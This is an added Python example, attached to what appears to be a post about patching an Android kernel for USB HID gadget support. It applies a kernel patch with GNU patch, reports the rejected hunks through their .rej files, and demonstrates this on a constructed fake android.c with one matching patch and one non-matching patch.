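An added example, not from the original post or from the pelya repository, of the check that would have flagged the android.c hunk automatically: dry-run the patch, apply it anyway so the hunks that fit go in, and list the .rej files GNU patch leaves behind for the hunks it could not place. The android.c contents and the two patches in the demo are constructed stand-ins (the real kernel-3.1.patch is far larger); apply_patch itself works unchanged on a real kernel tree.

```python
#!/usr/bin/env python3
"""Apply a kernel patch and report the hunks that need hand-patching (added example)."""
import shutil
import subprocess
import tempfile
from pathlib import Path


def apply_patch(srcdir, patchfile, strip=1):
    """Run GNU patch on `srcdir` and return (clean, rejected_files).

    A dry run first shows whether every hunk fits. If not, the patch is still
    applied, because the hunks that do fit are wanted; patch writes each
    failing hunk to <file>.rej, and those paths are returned so the rest can
    be applied by hand. Assumes the tree had no .rej files beforehand."""
    cmd = ["patch", "-d", str(srcdir), "-p%d" % strip, "--batch",
           "--no-backup-if-mismatch"]
    quiet = dict(stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    with open(patchfile, "rb") as fh:
        dry = subprocess.run(cmd + ["--dry-run"], stdin=fh, **quiet)
    with open(patchfile, "rb") as fh:
        subprocess.run(cmd, stdin=fh, **quiet)
    rejects = sorted(str(p.relative_to(srcdir)) for p in Path(srcdir).rglob("*.rej"))
    return dry.returncode == 0 and not rejects, rejects


# Constructed stand-in for drivers/usb/gadget/android.c and two constructed
# patches against it: one whose context matches and one whose context does not.
FAKE_ANDROID_C = "".join("int v%d = %d;\n" % (i, i) for i in range(6))
PATCH_HEADER = ("--- a/drivers/usb/gadget/android.c\n"
                "+++ b/drivers/usb/gadget/android.c\n")
GOOD_PATCH = PATCH_HEADER + ("@@ -1,3 +1,4 @@\n"
                             " int v0 = 0;\n"
                             "+int hid_gadget = 1;\n"
                             " int v1 = 1;\n"
                             " int v2 = 2;\n")
BAD_PATCH = PATCH_HEADER + ("@@ -1,6 +1,7 @@\n"
                            " int q0 = 0;\n"
                            " int q1 = 1;\n"
                            " int q2 = 2;\n"
                            "+int hid_gadget = 1;\n"
                            " int q3 = 3;\n"
                            " int q4 = 4;\n"
                            " int q5 = 5;\n")


def demo():
    """Run both patches against fresh copies of the fake tree.

    Returns None when GNU patch is not installed, otherwise a dict of
    name -> (clean, rejected_files)."""
    if shutil.which("patch") is None:
        return None
    results = {}
    for name, text in (("good", GOOD_PATCH), ("bad", BAD_PATCH)):
        with tempfile.TemporaryDirectory() as tmp:
            src = Path(tmp) / "kernel"
            target = src / "drivers" / "usb" / "gadget" / "android.c"
            target.parent.mkdir(parents=True)
            target.write_text(FAKE_ANDROID_C)
            patchfile = Path(tmp) / (name + ".patch")
            patchfile.write_text(text)
            results[name] = apply_patch(src, patchfile)
    return results


if __name__ == "__main__":
    # apply_patch("/root/android/system/kernel/htc/endeavoru", "kernel-3.1.patch") on a real tree
    print(demo())   # {'good': (True, []), 'bad': (False, ['drivers/usb/gadget/android.c.rej'])}
```

Each .rej file contains the hunk exactly as patch could not place it, with its intended context, which is what you read against the real file (line 1704 in the case above) when patching by hand.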